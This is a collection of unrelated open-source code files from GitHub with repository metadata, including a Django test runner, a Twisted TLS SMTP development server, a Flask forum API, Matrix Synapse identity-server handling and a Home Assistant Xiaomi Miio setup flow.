"repo_name": "mar10/fabulist",
"id": "fda5cddef76f3d8598ae46d3329169d6de156cf2",
"size": "5130",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "69429"
}
],
"symlink_target": ""
}
|
import os
import sys
import warnings
import django
from django.test.runner import DiscoverRunner
warnings.simplefilter('always')
os.environ['DJANGO_SETTINGS_MODULE'] = 'password_reset.tests.settings'
def runtests():
parent = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, parent)
django.setup()
runner = DiscoverRunner(verbosity=1, interactive=True,
failfast=bool(os.environ.get('FAILFAST')))
failures = runner.run_tests(())
sys.exit(failures)
if __name__ == '__main__':
runtests()
|
{
"content_hash": "dd7afc9f6e36ffc5791850e78201848e",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 70,
"avg_line_length": 21.615384615384617,
"alnum_prop": 0.6654804270462633,
"repo_name": "brutasse/django-password-reset",
"id": "8995ca540cdf8b8bbcfc3c3fefb9a4f0e8bfe0ee",
"size": "584",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "runtests.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "1659"
},
{
"name": "Python",
"bytes": "31957"
}
],
"symlink_target": ""
}
|
import threading
import time
import json
from twisted.internet import reactor, ssl
from twisted.internet.protocol import ServerFactory
from twisted.protocols.basic import LineReceiver
class TLSFactory(ServerFactory):
mailcontent = []
communication = []
tlsCert = None
tlsKey = None
class TLSServer(LineReceiver):
inData = False
def connectionMade(self):
self.sendLine("220 this.mx ESMTP Dev Server")
def lineReceived(self, line):
self.factory.communication.append(line)
if "ehlo" in line:
self.sendLine("250-this.mx at your service")
self.sendLine("250-SIZE 35882577")
self.sendLine("250-8BITMIME")
self.sendLine("250 STARTTLS")
return
if "starttls" in line.lower():
self.sendLine('220 Go ahead, i like TLS')
ctx = ssl.DefaultOpenSSLContextFactory(
privateKeyFileName=self.factory.tlsKey,
certificateFileName=self.factory.tlsCert,
sslmethod=ssl.SSL.SSLv23_METHOD)
self.transport.startTLS(ctx, self.factory)
return
if line == "quit":
self.sendLine("221 2.0.0 Bye")
self.stopProducing()
if not "data" in line:
if not self.inData:
self.sendLine("250 OK")
return
if line == ".":
self.inData = False
self.sendLine("250 2.0.0 OK, MESSAGE ACCEPTED")
else:
self.factory.mailcontent.append(line)
else:
self.sendLine("354 End data with <CR><LF>.<CR><LF>")
self.inData = True
def connectionLost(self, reason=None):
self.transport.loseConnection()
reactor.stop()
class SMTPDevServer(object):
port = None
timeout = None
tlsCert = None
tlsKey = None
def __init__(self, port=22525, timeout=None, tlscert=None, tlskey=None):
self.port = port
self.timeout = timeout
self.tlsCert = tlscert
self.tlsKey = tlskey
def receiveOneMail(self):
factory = TLSFactory()
factory.tlsCert = self.tlsCert
factory.tlsKey = self.tlsKey
factory.protocol = TLSServer
reactor.listenTCP(self.port, factory)
# setting up thread to check timeout
if self.timeout:
self._thread_stop = threading.Event()
t = threading.Thread(target=self._timeoutCounter, args=())
t.daemon = True
t.start()
#reactor.addSystemEventTrigger('before', 'shutdown', reactor.disconnectAll)
reactor.run()
self._thread_stop.set()
return {"communication": factory.communication, "rawmail": factory.mailcontent}
def _timeoutCounter(self):
timeWaited = 0
while True:
time.sleep(1)
timeWaited += 1
if timeWaited >= self.timeout:
print "Waiting for mail timeout, shutting down reactor"
break
reactor.callFromThread(reactor.stop)
if __name__ == '__main__':
smtp = SMTPDevServer(port=22525, timeout=10, tlscert='certs/server.crt', tlskey='certs/server.key')
data = smtp.receiveOneMail()
print json.dumps(data, indent=2)
|
{
"content_hash": "70951a3ba29a990af2caa6aee8676cae",
"timestamp": "",
"source": "github",
"line_count": 111,
"max_line_length": 103,
"avg_line_length": 30.027027027027028,
"alnum_prop": 0.5853585358535853,
"repo_name": "tspycher/python-devtlssmtpserver",
"id": "10aff1b883e0ab6cc64f26059bf424e1886edccb",
"size": "3333",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/devtlssmtpserver/server.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "7164"
}
],
"symlink_target": ""
}
|
from flask import request, session, g, redirect, url_for, abort
from . import api
from ..exceptions import ExistsError
from ..models import Category, Sub
from .main import BaseMethodView
class SubListView(BaseMethodView):
def get(self):
_subs = Sub.all()
subs = []
for sub in _subs:
sub.threads = Sub.get_threads(sub.id)
subs.append(sub)
return subs
def post(self):
self.is_admin()
data = request.json
if not 'description' in data:
data['description'] = ''
missing_data = self.missing_data(['category', 'title'])
if missing_data:
return missing_data
category = Category.get(request.json['category'])
if not category:
return self.error('Category not found', 404)
try:
sub = Sub.create(category, title=data['title'],
description=data['description'])
except ExistsError:
return self.error('Sub exists', 409)
return sub, 201
class SubDetailView(BaseMethodView):
model = Sub
def get(self, id):
sub = self.get_or_404(id)
sub.threads = Sub.get_threads(sub.id)
return sub
def put(self, id):
self.is_admin()
sub = self.get_or_404(id)
missing_data = self.missing_data(['title'])
if missing_data:
return missing_data
sub = Sub.edit(id, **request.json)
return sub, 200
def delete(self, id):
self.is_admin()
self.get_or_404(id)
Sub.delete(id)
return '', 200
list_view = SubListView.as_view('sub_list')
detail_view = SubDetailView.as_view('sub_detail')
api.add_url_rule('/sub/', view_func=list_view, methods=['GET', 'POST'])
api.add_url_rule('/sub/<int:id>/', view_func=detail_view,
methods=['GET', 'PUT', 'DELETE'])
|
{
"content_hash": "1d814ab4409f86d18501845cab00a5c9",
"timestamp": "",
"source": "github",
"line_count": 72,
"max_line_length": 71,
"avg_line_length": 26.430555555555557,
"alnum_prop": 0.5717288491854966,
"repo_name": "spaceexperiment/forum-app",
"id": "789ff704c7e81df8d3a95cdbaae2e322b4af438d",
"size": "1903",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/api/views/sub.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "2306"
},
{
"name": "CoffeeScript",
"bytes": "1277"
},
{
"name": "JavaScript",
"bytes": "239"
},
{
"name": "Python",
"bytes": "73174"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ui', '0010_auto_20161118_0002'),
]
operations = [
migrations.AddField(
model_name='export',
name='export_segment_size',
field=models.BigIntegerField(default=250000, help_text=b'Number of items per file.', null=True, blank=True, choices=[(100000, b'100,000'), (250000, b'250,000'), (5000000, b'500,000'), (10000000, b'1,000,000'), (None, b'Single file'), (100, b'100')]),
),
]
|
{
"content_hash": "b4ead188c81c7106a5be53c69fcd1e9b",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 262,
"avg_line_length": 33.111111111111114,
"alnum_prop": 0.6140939597315436,
"repo_name": "gwu-libraries/sfm",
"id": "1f411c3b3d3caef125c848aaf0cfb118870c37f0",
"size": "620",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "sfm/ui/migrations/0011_export_export_segment_size.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "18062"
},
{
"name": "Python",
"bytes": "79138"
},
{
"name": "Shell",
"bytes": "4507"
}
],
"symlink_target": ""
}
|
"""Utilities for interacting with Identity Servers"""
from twisted.internet import defer
from synapse.api.errors import (
CodeMessageException
)
from ._base import BaseHandler
from synapse.util.async import run_on_reactor
from synapse.api.errors import SynapseError, Codes
import json
import logging
logger = logging.getLogger(__name__)
class IdentityHandler(BaseHandler):
def __init__(self, hs):
super(IdentityHandler, self).__init__(hs)
self.http_client = hs.get_simple_http_client()
self.trusted_id_servers = set(hs.config.trusted_third_party_id_servers)
self.trust_any_id_server_just_for_testing_do_not_use = (
hs.config.use_insecure_ssl_client_just_for_testing_do_not_use
)
def _should_trust_id_server(self, id_server):
if id_server not in self.trusted_id_servers:
if self.trust_any_id_server_just_for_testing_do_not_use:
logger.warn(
"Trusting untrustworthy ID server %r even though it isn't"
" in the trusted id list for testing because"
" 'use_insecure_ssl_client_just_for_testing_do_not_use'"
" is set in the config",
id_server,
)
else:
return False
return True
@defer.inlineCallbacks
def threepid_from_creds(self, creds):
yield run_on_reactor()
if 'id_server' in creds:
id_server = creds['id_server']
elif 'idServer' in creds:
id_server = creds['idServer']
else:
raise SynapseError(400, "No id_server in creds")
if 'client_secret' in creds:
client_secret = creds['client_secret']
elif 'clientSecret' in creds:
client_secret = creds['clientSecret']
else:
raise SynapseError(400, "No client_secret in creds")
if not self._should_trust_id_server(id_server):
logger.warn(
'%s is not a trusted ID server: rejecting 3pid ' +
'credentials', id_server
)
defer.returnValue(None)
data = {}
try:
data = yield self.http_client.get_json(
"https://%s%s" % (
id_server,
"/_matrix/identity/api/v1/3pid/getValidated3pid"
),
{'sid': creds['sid'], 'client_secret': client_secret}
)
except CodeMessageException as e:
data = json.loads(e.msg)
if 'medium' in data:
defer.returnValue(data)
defer.returnValue(None)
@defer.inlineCallbacks
def bind_threepid(self, creds, mxid):
yield run_on_reactor()
logger.debug("binding threepid %r to %s", creds, mxid)
data = None
if 'id_server' in creds:
id_server = creds['id_server']
elif 'idServer' in creds:
id_server = creds['idServer']
else:
raise SynapseError(400, "No id_server in creds")
if 'client_secret' in creds:
client_secret = creds['client_secret']
elif 'clientSecret' in creds:
client_secret = creds['clientSecret']
else:
raise SynapseError(400, "No client_secret in creds")
try:
data = yield self.http_client.post_urlencoded_get_json(
"https://%s%s" % (
id_server, "/_matrix/identity/api/v1/3pid/bind"
),
{
'sid': creds['sid'],
'client_secret': client_secret,
'mxid': mxid,
}
)
logger.debug("bound threepid %r to %s", creds, mxid)
except CodeMessageException as e:
data = json.loads(e.msg)
defer.returnValue(data)
@defer.inlineCallbacks
def requestEmailToken(self, id_server, email, client_secret, send_attempt, **kwargs):
yield run_on_reactor()
if not self._should_trust_id_server(id_server):
raise SynapseError(
400, "Untrusted ID server '%s'" % id_server,
Codes.SERVER_NOT_TRUSTED
)
params = {
'email': email,
'client_secret': client_secret,
'send_attempt': send_attempt,
}
params.update(kwargs)
try:
data = yield self.http_client.post_urlencoded_get_json(
"https://%s%s" % (
id_server,
"/_matrix/identity/api/v1/validate/email/requestToken"
),
params
)
defer.returnValue(data)
except CodeMessageException as e:
logger.info("Proxied requestToken failed: %r", e)
raise e
|
{
"content_hash": "dcb6b90d269cf118f728ff43a020c155",
"timestamp": "",
"source": "github",
"line_count": 148,
"max_line_length": 89,
"avg_line_length": 32.75675675675676,
"alnum_prop": 0.5377475247524752,
"repo_name": "TribeMedia/synapse",
"id": "559e5d5a716a3aafe2ded2c1eb640d22f9c2af98",
"size": "5457",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "synapse/handlers/identity.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "4376"
},
{
"name": "HTML",
"bytes": "9046"
},
{
"name": "JavaScript",
"bytes": "176441"
},
{
"name": "Perl",
"bytes": "31852"
},
{
"name": "Python",
"bytes": "2748398"
},
{
"name": "Shell",
"bytes": "7827"
}
],
"symlink_target": ""
}
|
"""Config flow to configure Xiaomi Miio."""
from __future__ import annotations
from collections.abc import Mapping
import logging
from re import search
from typing import Any
from micloud import MiCloud
from micloud.micloudexception import MiCloudAccessDenied
import voluptuous as vol
from homeassistant import config_entries
from homeassistant.components import zeroconf
from homeassistant.config_entries import SOURCE_REAUTH, ConfigEntry
from homeassistant.const import CONF_HOST, CONF_MODEL, CONF_TOKEN
from homeassistant.core import callback
from homeassistant.data_entry_flow import FlowResult
from homeassistant.helpers.device_registry import format_mac
from .const import (
CONF_CLOUD_COUNTRY,
CONF_CLOUD_PASSWORD,
CONF_CLOUD_SUBDEVICES,
CONF_CLOUD_USERNAME,
CONF_DEVICE,
CONF_FLOW_TYPE,
CONF_GATEWAY,
CONF_MAC,
CONF_MANUAL,
DEFAULT_CLOUD_COUNTRY,
DOMAIN,
MODELS_ALL,
MODELS_ALL_DEVICES,
MODELS_GATEWAY,
SERVER_COUNTRY_CODES,
AuthException,
SetupException,
)
from .device import ConnectXiaomiDevice
_LOGGER = logging.getLogger(__name__)
DEVICE_SETTINGS = {
vol.Required(CONF_TOKEN): vol.All(str, vol.Length(min=32, max=32)),
}
DEVICE_CONFIG = vol.Schema({vol.Required(CONF_HOST): str}).extend(DEVICE_SETTINGS)
DEVICE_MODEL_CONFIG = vol.Schema({vol.Required(CONF_MODEL): vol.In(MODELS_ALL)})
DEVICE_CLOUD_CONFIG = vol.Schema(
{
vol.Optional(CONF_CLOUD_USERNAME): str,
vol.Optional(CONF_CLOUD_PASSWORD): str,
vol.Optional(CONF_CLOUD_COUNTRY, default=DEFAULT_CLOUD_COUNTRY): vol.In(
SERVER_COUNTRY_CODES
),
vol.Optional(CONF_MANUAL, default=False): bool,
}
)
class OptionsFlowHandler(config_entries.OptionsFlow):
"""Options for the component."""
def __init__(self, config_entry: config_entries.ConfigEntry) -> None:
"""Init object."""
self.config_entry = config_entry
async def async_step_init(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Manage the options."""
errors = {}
if user_input is not None:
use_cloud = user_input.get(CONF_CLOUD_SUBDEVICES, False)
cloud_username = self.config_entry.data.get(CONF_CLOUD_USERNAME)
cloud_password = self.config_entry.data.get(CONF_CLOUD_PASSWORD)
cloud_country = self.config_entry.data.get(CONF_CLOUD_COUNTRY)
if use_cloud and (
not cloud_username or not cloud_password or not cloud_country
):
errors["base"] = "cloud_credentials_incomplete"
# trigger re-auth flow
self.hass.async_create_task(
self.hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_REAUTH},
data=self.config_entry.data,
)
)
if not errors:
return self.async_create_entry(title="", data=user_input)
settings_schema = vol.Schema(
{
vol.Optional(
CONF_CLOUD_SUBDEVICES,
default=self.config_entry.options.get(CONF_CLOUD_SUBDEVICES, False),
): bool
}
)
return self.async_show_form(
step_id="init", data_schema=settings_schema, errors=errors
)
class XiaomiMiioFlowHandler(config_entries.ConfigFlow, domain=DOMAIN):
"""Handle a Xiaomi Miio config flow."""
VERSION = 1
def __init__(self) -> None:
"""Initialize."""
self.host: str | None = None
self.mac: str | None = None
self.token = None
self.model = None
self.name = None
self.cloud_username = None
self.cloud_password = None
self.cloud_country = None
self.cloud_devices: dict[str, dict[str, Any]] = {}
@staticmethod
@callback
def async_get_options_flow(config_entry: ConfigEntry) -> OptionsFlowHandler:
"""Get the options flow."""
return OptionsFlowHandler(config_entry)
async def async_step_reauth(self, entry_data: Mapping[str, Any]) -> FlowResult:
"""Perform reauth upon an authentication error or missing cloud credentials."""
self.host = entry_data[CONF_HOST]
self.token = entry_data[CONF_TOKEN]
self.mac = entry_data[CONF_MAC]
self.model = entry_data.get(CONF_MODEL)
return await self.async_step_reauth_confirm()
async def async_step_reauth_confirm(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Dialog that informs the user that reauth is required."""
if user_input is not None:
return await self.async_step_cloud()
return self.async_show_form(step_id="reauth_confirm")
async def async_step_user(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Handle a flow initialized by the user."""
return await self.async_step_cloud()
async def async_step_zeroconf(
self, discovery_info: zeroconf.ZeroconfServiceInfo
) -> FlowResult:
"""Handle zeroconf discovery."""
name = discovery_info.name
self.host = discovery_info.host
self.mac = discovery_info.properties.get("mac")
if self.mac is None:
poch = discovery_info.properties.get("poch", "")
if (result := search(r"mac=\w+", poch)) is not None:
self.mac = result.group(0).split("=")[1]
if not name or not self.host or not self.mac:
return self.async_abort(reason="not_xiaomi_miio")
self.mac = format_mac(self.mac)
# Check which device is discovered.
for gateway_model in MODELS_GATEWAY:
if name.startswith(gateway_model.replace(".", "-")):
unique_id = self.mac
await self.async_set_unique_id(unique_id)
self._abort_if_unique_id_configured({CONF_HOST: self.host})
self.context.update(
{"title_placeholders": {"name": f"Gateway {self.host}"}}
)
return await self.async_step_cloud()
for device_model in MODELS_ALL_DEVICES:
if name.startswith(device_model.replace(".", "-")):
unique_id = self.mac
await self.async_set_unique_id(unique_id)
self._abort_if_unique_id_configured({CONF_HOST: self.host})
self.context.update(
{"title_placeholders": {"name": f"{device_model} {self.host}"}}
)
return await self.async_step_cloud()
# Discovered device is not yet supported
_LOGGER.debug(
"Not yet supported Xiaomi Miio device '%s' discovered with host %s",
name,
self.host,
)
return self.async_abort(reason="not_xiaomi_miio")
def extract_cloud_info(self, cloud_device_info: dict[str, Any]) -> None:
"""Extract the cloud info."""
if self.host is None:
self.host = cloud_device_info["localip"]
if self.mac is None:
self.mac = format_mac(cloud_device_info["mac"])
if self.model is None:
self.model = cloud_device_info["model"]
if self.name is None:
self.name = cloud_device_info["name"]
self.token = cloud_device_info["token"]
async def async_step_cloud(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Configure a xiaomi miio device through the Miio Cloud."""
errors = {}
if user_input is not None:
if user_input[CONF_MANUAL]:
return await self.async_step_manual()
cloud_username = user_input.get(CONF_CLOUD_USERNAME)
cloud_password = user_input.get(CONF_CLOUD_PASSWORD)
cloud_country = user_input.get(CONF_CLOUD_COUNTRY)
if not cloud_username or not cloud_password or not cloud_country:
errors["base"] = "cloud_credentials_incomplete"
return self.async_show_form(
step_id="cloud", data_schema=DEVICE_CLOUD_CONFIG, errors=errors
)
miio_cloud = MiCloud(cloud_username, cloud_password)
try:
if not await self.hass.async_add_executor_job(miio_cloud.login):
errors["base"] = "cloud_login_error"
except MiCloudAccessDenied:
errors["base"] = "cloud_login_error"
except Exception: # pylint: disable=broad-except
_LOGGER.exception("Unexpected exception in Miio cloud login")
return self.async_abort(reason="unknown")
if errors:
return self.async_show_form(
step_id="cloud", data_schema=DEVICE_CLOUD_CONFIG, errors=errors
)
try:
devices_raw = await self.hass.async_add_executor_job(
miio_cloud.get_devices, cloud_country
)
except Exception: # pylint: disable=broad-except
_LOGGER.exception("Unexpected exception in Miio cloud get devices")
return self.async_abort(reason="unknown")
if not devices_raw:
errors["base"] = "cloud_no_devices"
return self.async_show_form(
step_id="cloud", data_schema=DEVICE_CLOUD_CONFIG, errors=errors
)
self.cloud_devices = {}
for device in devices_raw:
if not device.get("parent_id"):
name = device["name"]
model = device["model"]
list_name = f"{name} - {model}"
self.cloud_devices[list_name] = device
self.cloud_username = cloud_username
self.cloud_password = cloud_password
self.cloud_country = cloud_country
if self.host is not None:
for device in self.cloud_devices.values():
cloud_host = device.get("localip")
if cloud_host == self.host:
self.extract_cloud_info(device)
return await self.async_step_connect()
if len(self.cloud_devices) == 1:
self.extract_cloud_info(list(self.cloud_devices.values())[0])
return await self.async_step_connect()
return await self.async_step_select()
return self.async_show_form(
step_id="cloud", data_schema=DEVICE_CLOUD_CONFIG, errors=errors
)
async def async_step_select(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Handle multiple cloud devices found."""
errors: dict[str, str] = {}
if user_input is not None:
cloud_device = self.cloud_devices[user_input["select_device"]]
self.extract_cloud_info(cloud_device)
return await self.async_step_connect()
select_schema = vol.Schema(
{vol.Required("select_device"): vol.In(list(self.cloud_devices))}
)
return self.async_show_form(
step_id="select", data_schema=select_schema, errors=errors
)
async def async_step_manual(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Configure a xiaomi miio device Manually."""
errors: dict[str, str] = {}
if user_input is not None:
self.token = user_input[CONF_TOKEN]
if user_input.get(CONF_HOST):
self.host = user_input[CONF_HOST]
return await self.async_step_connect()
if self.host:
schema = vol.Schema(DEVICE_SETTINGS)
else:
schema = DEVICE_CONFIG
return self.async_show_form(step_id="manual", data_schema=schema, errors=errors)
async def async_step_connect(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Connect to a xiaomi miio device."""
errors: dict[str, str] = {}
if self.host is None or self.token is None:
return self.async_abort(reason="incomplete_info")
if user_input is not None:
self.model = user_input[CONF_MODEL]
# Try to connect to a Xiaomi Device.
connect_device_class = ConnectXiaomiDevice(self.hass)
try:
await connect_device_class.async_connect_device(self.host, self.token)
except AuthException:
if self.model is None:
errors["base"] = "wrong_token"
except SetupException:
if self.model is None:
errors["base"] = "cannot_connect"
except Exception: # pylint: disable=broad-except
_LOGGER.exception("Unexpected exception in connect Xiaomi device")
return self.async_abort(reason="unknown")
device_info = connect_device_class.device_info
if self.model is None and device_info is not None:
self.model = device_info.model
if self.model is None and not errors:
errors["base"] = "cannot_connect"
if errors:
return self.async_show_form(
step_id="connect", data_schema=DEVICE_MODEL_CONFIG, errors=errors
)
if self.mac is None and device_info is not None:
self.mac = format_mac(device_info.mac_address)
unique_id = self.mac
existing_entry = await self.async_set_unique_id(
unique_id, raise_on_progress=False
)
if existing_entry:
data = existing_entry.data.copy()
data[CONF_HOST] = self.host
data[CONF_TOKEN] = self.token
if (
self.cloud_username is not None
and self.cloud_password is not None
and self.cloud_country is not None
):
data[CONF_CLOUD_USERNAME] = self.cloud_username
data[CONF_CLOUD_PASSWORD] = self.cloud_password
data[CONF_CLOUD_COUNTRY] = self.cloud_country
if self.hass.config_entries.async_update_entry(existing_entry, data=data):
await self.hass.config_entries.async_reload(existing_entry.entry_id)
return self.async_abort(reason="reauth_successful")
if self.name is None:
self.name = self.model
flow_type = None
for gateway_model in MODELS_GATEWAY:
if self.model.startswith(gateway_model):
flow_type = CONF_GATEWAY
if flow_type is None:
for device_model in MODELS_ALL_DEVICES:
if self.model.startswith(device_model):
flow_type = CONF_DEVICE
if flow_type is not None:
return self.async_create_entry(
title=self.name,
data={
CONF_FLOW_TYPE: flow_type,
CONF_HOST: self.host,
CONF_TOKEN: self.token,
CONF_MODEL: self.model,
CONF_MAC: self.mac,
CONF_CLOUD_USERNAME: self.cloud_username,
CONF_CLOUD_PASSWORD: self.cloud_password,
CONF_CLOUD_COUNTRY: self.cloud_country,
},
)
errors["base"] = "unknown_device"
return self.async_show_form(
step_id="connect", data_schema=DEVICE_MODEL_CONFIG, errors=errors
)
|
{
"content_hash": "5718343be334c038ce8e7e5580823801",
"timestamp": "",
"source": "github",
"line_count": 422,
"max_line_length": 88,
"avg_line_length": 37.002369668246445,
"alnum_prop": 0.5766250400256164,
"repo_name": "mezz64/home-assistant",
"id": "70e6fb5c0b6bedf23d88e4e73bd9d87932002ce0",
"size": "15615",
"binary": false,
"copies": "2",
"ref": "refs/heads/dev",
"path": "homeassistant/components/xiaomi_miio/config_flow.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2963"
},
{
"name": "PLSQL",
"bytes": "840"
},
{
"name": "Python",
"bytes": "52481895"
},
{
"name": "Shell",
"bytes": "6252"
}
],
"symlink_target": ""
}
|
from django.contrib import admin
from starbowmodweb.ladder.models import Map, Client, BattleNetCharacter, CrashReport
import modeladmins
admin.site.register(Map, modeladmins.MapModelAdmin)
admin.site.register(Client, modeladmins.ClientModelAdmin)
# admin.site.register(ClientRegionStats)
# admin.site.register(MatchmakerMatch)
# admin.site.register(MatchmakerMatchParticipant)
# admin.site.register(MatchResultPlayer)
# admin.site.register(MatchResult)
admin.site.register(BattleNetCharacter)
admin.site.register(CrashReport)
|
{
"content_hash": "0f1cfaf16ea0556c1da55683e591eec6",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 84,
"avg_line_length": 37.714285714285715,
"alnum_prop": 0.8446969696969697,
"repo_name": "Starbow/StarbowWebSite",
"id": "9cf67cd03e8f3410d3836110ee44503afbc6d187",
"size": "528",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "starbowmodweb/ladder/admin.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "15336"
},
{
"name": "HTML",
"bytes": "24427"
},
{
"name": "JavaScript",
"bytes": "319"
},
{
"name": "Python",
"bytes": "110503"
}
],
"symlink_target": ""
}
|
import os
import numpy as np
if __name__ == "__main__":
## which have already been run?
enumerate_dir = os.path.join(os.getcwd(),'enumerateOutput')
if len(os.listdir(enumerate_dir))==1:
results_dir = os.path.join(enumerate_dir,os.listdir(enumerate_dir)[0])
print 'Results dir is: {}'.format(results_dir)
completed_inds = map(int,[i.split('_')[2] for i in os.listdir(results_dir)])
## which still need to be run
still_to_run = [i for i in np.arange(1,200,2) if i not in completed_inds]
print 'These still yet to run: {}'.format(still_to_run)
## identify how many different new RSA.py calls to make
## by getting list of straggler lower bounds
straggler_lb = np.where(np.diff(still_to_run) !=2)[0]
if len(straggler_lb)==0:
print 'No stragglers, run them all.'
## which split?
which_split = os.listdir(results_dir)[0].split('_')[0]
if len(still_to_run)>0:
## go through and run RSA.py for earliest to latest in list of still to run
lb = still_to_run[0]
ub = still_to_run[-1]
print 'Lower bound: {} Upper bound: {}'.format(lb, ub)
cmd_string = 'python RSA.py --wppl BDA-enumerate --sim_scaling_lb {} --sim_scaling_ub {} --step_size 2 --split_type {}'.format(lb, ub, which_split)
print 'Running: {}'.format(cmd_string)
os.system(cmd_string)
else:
print 'No more left to run, you should be all set.'
else:
print 'There is more than one dir in enumerateOutput. This (barebones) script designed to handle case where there is only one dir in enumerateOutput to patch.'
|
{
"content_hash": "e1b512712df981c37758a405c3e2417a",
"timestamp": "",
"source": "github",
"line_count": 44,
"max_line_length": 161,
"avg_line_length": 34.86363636363637,
"alnum_prop": 0.6714471968709257,
"repo_name": "judithfan/graphcomm",
"id": "2cdabed235e6fd9fa9465c8d107b7810419123a2",
"size": "1534",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "models/bda_enumerate_job_patcher.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "51808"
},
{
"name": "HTML",
"bytes": "74338"
},
{
"name": "JavaScript",
"bytes": "6970960"
},
{
"name": "Shell",
"bytes": "83"
},
{
"name": "TeX",
"bytes": "23048"
}
],
"symlink_target": ""
}
|
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
SETTINGS_TYPES = {
"RECAPTCHA_DOMAIN": str,
"RECAPTCHA_PRIVATE_KEY": str,
"RECAPTCHA_PROXY": dict,
"RECAPTCHA_PUBLIC_KEY": str,
"RECAPTCHA_VERIFY_REQUEST_TIMEOUT": int,
}
# Validate settings types.
for variable, instance_type in SETTINGS_TYPES.items():
if hasattr(settings, variable) \
and not isinstance(getattr(settings, variable), instance_type):
raise ImproperlyConfigured(
"Setting %s is not of type" % variable, instance_type
)
default_app_config = "captcha.apps.CaptchaConfig"
|
{
"content_hash": "457ad80805328cf1da58d567cd91d03b",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 75,
"avg_line_length": 30.523809523809526,
"alnum_prop": 0.6957878315132605,
"repo_name": "praekelt/django-recaptcha",
"id": "17d92a7b95f59d5392c1af3fec22f949650833d4",
"size": "641",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "captcha/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "3199"
},
{
"name": "Python",
"bytes": "38695"
}
],
"symlink_target": ""
}
|
version_info = {'branch_nick': u'LOCALBRANCH',
'revision_id': 'LOCALREVISION',
'revno': 0}
HORIZON_VERSION = ['2012', '2', None]
YEAR, COUNT, REVISION = HORIZON_VERSION
FINAL = True # This becomes true at Release Candidate time
def canonical_version_string():
return '.'.join(filter(None, HORIZON_VERSION))
def version_string():
if FINAL:
return canonical_version_string()
else:
return '%s-dev' % (canonical_version_string(),)
|
{
"content_hash": "130e45cbe8221cb10d5719b94aa36beb",
"timestamp": "",
"source": "github",
"line_count": 19,
"max_line_length": 60,
"avg_line_length": 26.05263157894737,
"alnum_prop": 0.6222222222222222,
"repo_name": "tylertian/Openstack",
"id": "1db0857a4e40cf213b846f07ee7dfb7b62b9e9af",
"size": "1149",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "openstack F/horizon/horizon/version.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "239919"
},
{
"name": "JavaScript",
"bytes": "156942"
},
{
"name": "Python",
"bytes": "16949418"
},
{
"name": "Shell",
"bytes": "96743"
}
],
"symlink_target": ""
}
|
"""dais URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
#import user
#import home
urlpatterns = [
url(r'^', include('home.urls')),
url(r'^ajax/', include('ajax.urls')),
url(r'^home/', include('home.urls')),
url(r'^post/', include('post.urls')),
url(r'^user/', include('user.urls')),
url(r'^error/', include('error.urls')),
url(r'^daisadmin/', include('daisadmin.urls')),
url(r'^politics/', include('politics.urls')),
]
|
{
"content_hash": "62578e78b501344e98cc98764ccd7c27",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 79,
"avg_line_length": 35.774193548387096,
"alnum_prop": 0.6636609558160504,
"repo_name": "amitdhiman000/dais",
"id": "6120a889d0878333c118f432c87fef0c21d89750",
"size": "1109",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "dais/urls.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "3340"
},
{
"name": "HTML",
"bytes": "101233"
},
{
"name": "JavaScript",
"bytes": "22466"
},
{
"name": "Python",
"bytes": "94519"
}
],
"symlink_target": ""
}
|
"""
SAGA.database
This subpackage contains database-related routines, including Database
"""
from .core import *
